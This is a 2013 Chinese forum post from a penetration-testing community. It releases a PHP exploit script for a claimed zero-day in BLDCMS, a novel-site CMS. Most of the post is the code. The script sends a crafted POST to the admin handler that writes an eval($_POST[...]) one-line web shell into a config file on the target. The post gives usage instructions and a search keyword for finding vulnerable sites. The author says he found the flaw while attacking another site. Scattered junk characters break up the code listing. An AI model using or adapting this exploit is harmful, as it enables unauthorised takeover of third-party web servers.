中国网络渗透测试联盟
标题:
BLDCMS(白老大小说) Getshell 0day EXP
[打印本页]
作者:
admin
时间:
2013-3-26 20:49
标题:
BLDCMS(白老大小说) Getshell 0day EXP
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
# E1 `: s/ I) n: F$ {
" |$ f, G. P( B# ~/ k! \
/ \% k. T2 V0 ~! \9 a* U5 Z
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
9 x2 Q% e1 q2 W5 D5 H
" F" Q: C( x: B) P; y& ^8 R
既然都有人发了 我就把我之前写好的EXP放出来吧
5 k0 R' |+ ~ I7 n: p+ `
' X3 r" q" `; q# Z1 [% }* q6 C+ E9 k
view source print?01.php;">
7 Y+ S. Q8 m1 ^; o
02.<!--?php
0 v9 u* m- U$ H' }) E
03.echo "-------------------------------------------------------------------
0 o' d# @' i" l" {/ e
04.
0 D2 l5 W Q( Z' ]: J2 F [# T
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
* [: R, P' t6 U( \7 G, H
06.
: K6 O0 G6 {$ O0 u* }! l; U
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
3 t. I# o) S" H# t1 i n# C$ Z
08.
+ w; E+ k+ o# e5 o m" i2 A: D& X
09.QQ:981009941\r\n 2013.3.21\r\n
! L0 r0 e2 j j$ F% ~. ?$ _
10.
" c- F$ o- V" T) d+ a' M3 \& Y2 O3 a
11.
* b) f" y: Q/ X- t5 q/ P# e
12.用法:php.exe EXP.php
www.baidu.com
/cms/ pass(一句话密码
# J S6 T4 i! G4 i' {0 j' e, a$ f) [
13.
/ A3 G8 B+ {) T# Y- |- {4 a
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
3 f6 Q+ L7 |1 c8 n4 O
15.
6 h( u9 z+ f$ f+ E; v
16.--------------------------------------------------------------------\r\n";
$ _# p; e0 G$ `/ l. V
17.$url=$argv[1];
) U8 D4 q, {2 D" u4 I
18.$dir=$argv[2];
3 @+ T, \+ Y6 M5 b% ^8 T& N
19.$pass=$argv[3];
$ q, R, H5 _9 A" d2 I6 U; s# |
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
" i: T/ U; G) k1 m& ~
21.if (emptyempty($pass)||emptyempty($url))
8 L" D) C3 \: {1 s3 `% ^
22.{exit("请输入参数");}
: K" w; ]$ t' b7 f! ]8 N
23.else
0 f, U7 b' o' ^* f: B3 t
24.{
) E% W b7 |5 v( n+ K2 X
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
8 f- o/ {6 O; ^/ E# R# v
26.
* m& A- W4 K% c/ P. ]' S9 y
27.al;
0 ?$ k; F2 N' f7 @1 w
28.$length = strlen($fuckdata);
7 v9 ], }. Z) M+ d' j
29.function getshell($url,$pass)
# ?/ G# P# k' j4 V% g Q# H$ q
30.{
( }0 J ~) e) ^ K& M
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
' T+ W2 F6 o% f3 j$ y: X5 ]' @& Y
32.$header = "
OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
- A) Q9 U8 t: u
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
3 V2 J% `! ^" n( `) D8 i3 J
34.$header .= "User-Agent: MSIE\r\n";
' N+ w; [: c# }8 B
35.$header .= "Host:".$url."\r\n";
5 Y6 ]+ j1 c) E5 ? R# q
36.$header .= "Content-Length: ".$length."\r\n";
" X9 }$ q S' e6 s$ D( x( D
37.$header .= "Connection: Close\r\n";
0 o- j& \4 S$ @! Q! a1 P" `
38.$header .="\r\n";
9 X% N+ B$ o% d4 Q* _
39.$header .= $fuckdata."\r\n\r\n";
/ X5 H4 a8 W; g0 z
40.$fp = fsockopen($url, 80,$errno,$errstr,15);
/ o5 M' F$ y! x
41.if (!$fp)
. t7 B$ q" _0 ~0 b) D* V l1 e( Y
42.{
5 {3 ^3 M! R; M' g7 v" e1 J
43.exit ("利用失败:请检查指定目标是否能正常打开");
~! b; p2 X- c% K3 o0 U% c Q
44.}
( r% w4 d W- p, P |' X; G" m
45.else{ if (!fputs($fp,$header))
/ v$ M9 t. E3 q* P% J ?2 v# w4 o
46.{exit ("利用失败");}
4 r. |8 p4 @) E
47.else
7 a, P4 V6 p7 |! b
48.{
4 r$ ~ ~1 L# U3 {0 p
49.$receive = '';
- p- [# o" G/ t5 x7 X3 \
50.while (!feof($fp)) {
6 J6 E) R: r9 A! |2 P& U/ I
51.$receive .= @fgets($fp, 1000);
6 N4 g- F+ N0 H9 Z* Y6 i1 `
52.}
4 R. q) n4 Y8 \- L' H. `3 U/ B
53.@fclose($fp);
& W" ?( b5 l7 L
54.echo "$url/$dir/conn/config/normal2.php pass
pass(如连接失败 请检查目标
2 q5 G) \1 ]4 w, t) f$ @& [& }: ]
55.
0 |& X- u5 N, \* B
56.GPC是否=off)";
. s8 n4 `( j; h. ~* ^& ]2 g- t! W
57.}}
- Z4 p8 L* Z1 R0 a
58.}
/ j5 U/ }% T/ P) G% K$ k
59.}
( `' |" |0 z" d* z8 w
60.getshell($url,$pass);
" Q. Z6 K0 P1 k* ^. q
61.?-->
3 a& d4 s6 d3 E( q* v7 z0 E
b2 @& Q; N- G
* F& [2 ]. N2 o) G% E
1 n) h: W( X7 w9 V+ a6 ^5 j
by 数据流
3 h5 Y; A$ u2 s; k1 N
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2